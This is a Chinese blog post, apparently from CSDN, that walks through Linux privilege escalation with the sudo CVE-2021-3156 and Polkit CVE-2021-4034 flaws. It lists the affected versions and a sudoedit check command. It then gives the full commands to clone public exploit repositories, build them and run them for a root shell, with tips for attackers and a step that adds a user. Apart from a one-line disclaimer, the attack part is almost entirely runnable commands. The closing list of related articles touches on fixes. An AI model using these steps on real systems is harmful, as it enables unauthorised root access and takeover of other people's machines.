Linux提权--SUDO(CVE-2021-3156)&Polkit(CVE-2021-4034)

最新推荐文章于 2024-07-06 10:53:58 发布
最新推荐文章于 2024-07-06 10:53:58 发布
阅读量494 收藏 10
点赞数 5
分类专栏: # 权限提升 文章标签: linux 运维 服务器 安全 网络 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/138800803
版权

免责声明:本文仅做技术学习与交流...

目录

SUDO(CVE-2021-3156)

影响版本

-判断:

-利用:

Polkit(CVE-2021-4034) ​

-判断:

-利用:

添加用户

SUDO(CVE-2021-3156)

another: SUDO权限配置不当.

影响版本

由系统的内核和发布版本等等决定...(版本符合基本就拿下)

sudo: 1.8.2 - 1.8.31p2

sudo: 1.9.0 - 1.9.5p1

sudo 命令 
sudo --version
​

-判断:

1-sudo版本判断.

2-命令报错判断:

sudoedit -s /         --报错则存在漏洞.

-利用:

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make 
chmod a+x sudo-hax-me-a-sandwich
​
uname -a    #查看内核版本
id
#最后的参数自己选:
./sudo-hax-me-a-sandwich 1 
-->提权之后的会话就是root权限了
​

Polkit(CVE-2021-4034) ​

vulhub/polkit/CVE-2021-4034/README.zh-cn.md at master · vulhub/vulhub · GitHub

漏洞影响2009年5月至今的所有polkit版本.

由于polkit是系统预装工具,所有存在polkit的linux系统均受影响

如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等

-判断:

dpkg -l policykit-1

--有信息就是有.

-利用:

git clone https://github.com/berdav/CVE-2021-4034.git

--没有git命令就自己上传.或wget命令

yum install git

cd CVE-2021-4034/

make

./cve-2021-4034

id

---判断一下--发现没有--->上来就直接干

--上传--打开时用到的权限还是test的,所以就不要直接上传,用wget...

--运行之后没有结果就GG...

添加用户

useradd -d /home/test -m test

金灰
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CVE-2021-4034_Polkit提权漏洞复现与修复
Jietewang的博客
06-09 5619
CVE-2021-4034:利用polkit的pkexec进行Linux普通权限提升测试以及CentOS和Ubuntu修复建议
polkit pkexec 本地提权漏洞
sre救赎之路
05-04 936
2022年1月25日。
Linux Polkit本地权限提升漏洞处理(CVE-2021- 4034
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
02-07 1万+
一、背景   安全部门近期发出安全预警,提示:常见发现版本的 CentOS、Ubuntu及Debian Linux系统中默认安装的Polkit工具集存在本地权限提升的漏洞CVE-2021- 4034),目前漏洞利用代码已在互联网公开;    Linux Polkit工具集是Linux系统在安装过程中自带的系统工具集,其中包括大量运维常用工具。该工具集中的pkexec在特定情况下无法正确处理调用参数计数,因此会尝试将环境变量作为命令执行。攻击者可以通过控制环境变量,使自身从系统普通用户权限提升至管理员权限,对
泱脏武器库之 CVE 2021-4034 Polkit 提权小结
weixin_41557838的博客
03-17 2471
背景: 2021年11月29日,Qualys Security Advisory 组织发现并提交了针对于Linux Polkit 组件的提权漏洞CVE 2021-4034,覆盖广泛的Linux发行版本,如 :RedHat Entreprise Linux、Fedora、 Ubuntu、 ArchLinux、国内发行版本如:Kylin Linux、UOS Linux、Euler OS、Anolis OS、Circle Linux,影响范围涉及从2009年5月至2022年1月横跨10余年的全部发行版本。 ..
Polkit(CVE-2021-4034复现)提权
m0_62207170的博客
03-02 205
CVE-2021-4034复现
服务器polkit pkexec 本地提权漏洞(CVE-2021-4034)修复
灵壹Eli的博客
08-01 298
服务器polkit pkexec 本地提权漏洞(CVE-2021-4034)遇到漏洞。
CVE-2021-3156sudo提权漏洞
RAFANra的博客
03-21 637
CVE-2021-3156漏洞复现 漏洞名称:Linux sudo权限提升漏洞 漏洞描述:1月26日,sudo发布安全通告,修复了一个类Unix操作系统在命令参数中,转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户,利用sudo获得
【漏洞复现】利用CVE-2021-4034Linux提权
weixin_46022776的博客
05-07 274
CVE-2021-4034存在于Polkit的pkexec中,pkexec是一个类似sudo的SUID root程序,允许授权用户作为其它用户执行程序,如未指定程序则运行默认shell,如果未指定用户名,则将作为管理员用户root执行。该漏洞自2009年5月起便已经存在,受影响的Linux发行版包括Ubuntu、Debian、Fedora、CentOS等。
CVE-2023-32233 (LINUX内核权限提升漏洞)
最新发布
m0_65354386的博客
07-06 943
Linux内核版本v5.14 — v6.6的netfilter 子系统nf_tables组件中存在释放后使用漏洞,由于在nft_verdict_init()函数中,允许正值作为hook判决中的丢弃错误,因此当NF_DROP发出类似于NF_ACCEPT的丢弃错误时,nf_hook_slow()函数可能会导致双重释放漏洞,从而本地低权攻击者可利用该漏洞将权限提升为root,对目标进行恶意攻击。目前该漏洞已经修复,受影响用户可通过升级系统或禁用受影响的 nf_tables 内核模块可以缓解此漏洞。
CVE-2021-4034】 漏洞详细原理以及复现,polkit的pkexec中的本地提权漏洞
Ba1_Ma0的博客
04-11 5702
简介 一个隐藏了12年的危险漏洞,利用的是polki的pkexec,它是一个 SUID 根程序,默认安装在每个主要的 Linux 发行版 Null 当你在linux下要查看文件时,运行列如像cat这样的程序,并提供test.txt作为参数 所以整个参数数组看起来如下: cat test.txt 0 1 cat是第一个参数索引’0’,第一个参数通常是程序本身的名称,在我们的例子中它是cat 第二个参数是我们刚刚提供带有索引’1’的test.txt的文件名,这些都是字符串 但是在内存中,过程看起来像
【漏洞复现】 Sudo缓存溢出提权漏洞(CVE-2021-3156
weixin_44647915的博客
04-22 5956
说明:此博客为本人的漏洞复现学习过程记录 前言 漏洞原理:本次的漏洞存在于Sudo上--一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击.
渗透测试:Linux提权精讲(一)之sudo方法第一期
Bossfrank的博客
07-29 2025
本文详解了渗透测试过程种获取初始立足点(通常是某个shell)后的利用sudo指令的提权方法,并对提权的原理和本质进行了介绍。总结了15种sudo提权方法,分别是sudo本身漏洞(CVE-2019-14287),sudo base32/58/64/nc/z, apt/apt-get , awk , cpulimit , dstat , env, apache2 , date, bash/ash/zsh/sh/dash/tclsh, cp, dd, curl, exiftool。
CVE-2021-3560-POLKIT本地提权漏洞复现
「鸿渐之翼」的博客
07-22 2061
博主:鴻漸之翼 个人介绍:男,搞底層的FW,喜歡發一點沒用的東西。 Polkit 0.105-26 0.117-2 - Local Privilege Escalation Exploit! Tested on Ubuntu20.10 Linux localhost 啟明星辰漏洞簡介 Polkit是许多Linux 发行版上默认安装的系统服务,它被systemd使用,所以任何使用systemd的Linux发行版都会使用polkit2021年06月03日,RedHat发布安全公告,修复了Linux Po
【操作系统安全】_sudo提权_CVE-2021-3156
soldi_er的博客
04-04 4097
文章目录sudo提权简单叙述实验利用Linux用户管理烂土豆提权cve-2019-14287参考 sudo提权 简单叙述 发布时间 CVE编号 类型 等级 影响范围 远程利用 2021-01-27 CVE-2021-3156 权限提升 高危 Sudo 1.8.2-31p2,Sudo 1.9.0-5p1 否   Sudo是一款允许普通用户执行root权限命令的工具, 在2021年01月26日被披露存在一个基于堆的缓冲区溢出漏洞(被命名为Baron Samedit),可导致本地权限提升。
Linux 提权
代码审计
04-13 2535
Linux提权助手 github项目 cve-2022-0847 面试重要最新漏洞 linux polkit 权限提升 大通杀 一、漏洞概述 1月26日,绿盟科技CERT监测到Qualys研究团队公开披露了在Polkit的pkexec 中发现的一个权限提升漏洞(CVE-2021-4034) ,也被称为PwnKit。该漏洞是由于pkexec 无法正确处理调用参数,从而将环境变量作为命令执行,具有任意用户权限的攻击者都可以在默认配置下通过修改环境变量来利用此漏洞,从而获得受影响主机的ro
Linux提权(sudopolkit)总结
csd_ct的专栏
01-31 5082
Linux-polkit提权总结 刚准备休年假,就收到监管的漏洞预警通-“Linux Polkit组件中pkexec程序存在权限提升漏洞(漏洞编号为CVE-2021-4034)。pkexec应用程序为Linux系统预装工具,漏洞影响Ubuntu、Debian、Fedora、CentOS等主流Linux发行版…“,啊,正值冬奥护网,各方都比较敏感,赶紧研究下,详见绿盟的CERT应急通知 1、漏洞概述 1月26日,绿盟科技CERT监测到Qualys研究团队公开披露了在Polkit的pkexec中发现的一个权限提
Polkit权限提升漏洞(CVE-2021-4034)利用及修复
zhongxj183的博客
02-16 1万+
Polkit本地权限提升漏洞(CVE-2021-4034)利用及修复 文章目录Polkit本地权限提升漏洞(CVE-2021-4034)利用及修复漏洞说明危害等级影响版本修复版本漏洞利用漏洞修复升级polkit版本临时修复方案-调整pkexec权限意见反馈 漏洞说明 2022年1月25日 qualys安全研究人员披露 CVE-2021-4034 polkit pkexec 本地提权漏洞漏洞细节,polkit pkexec 中对命令行参数处理有误,导致参数注入,能够导致本地提权。 pkexec应用程序为Lin
[漏洞分析] CVE-2021-3156 sudo提权分析及exp调试修改
热门推荐
Breeze的博客
01-24 1万+
本文提供CVE-2021-3156漏洞的docker调试环境;并对该漏洞原理以及利用细节、堆布局方法进行详细分析。
linux sudo提权漏洞,linux CVE-2019-14287 Sudo提权漏洞(示例代码)
05-19
CVE-2019-14287是一个sudo提权漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0(root) groups=0(root) ``` 这个命令的意思是以id为用户名,并以-1为用户ID,执行sudo的命令。这样一来,sudo会将命令以root用户的身份执行。攻击者可以利用这个漏洞来获取root权限,并执行其他恶意操作。 解决这个漏洞的方法是升级sudo到最新版本,并禁用旧版本的sudo。同时,管理员应该对系统进行定期的安全审计,并确保所有软件和系统组件都是最新的。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值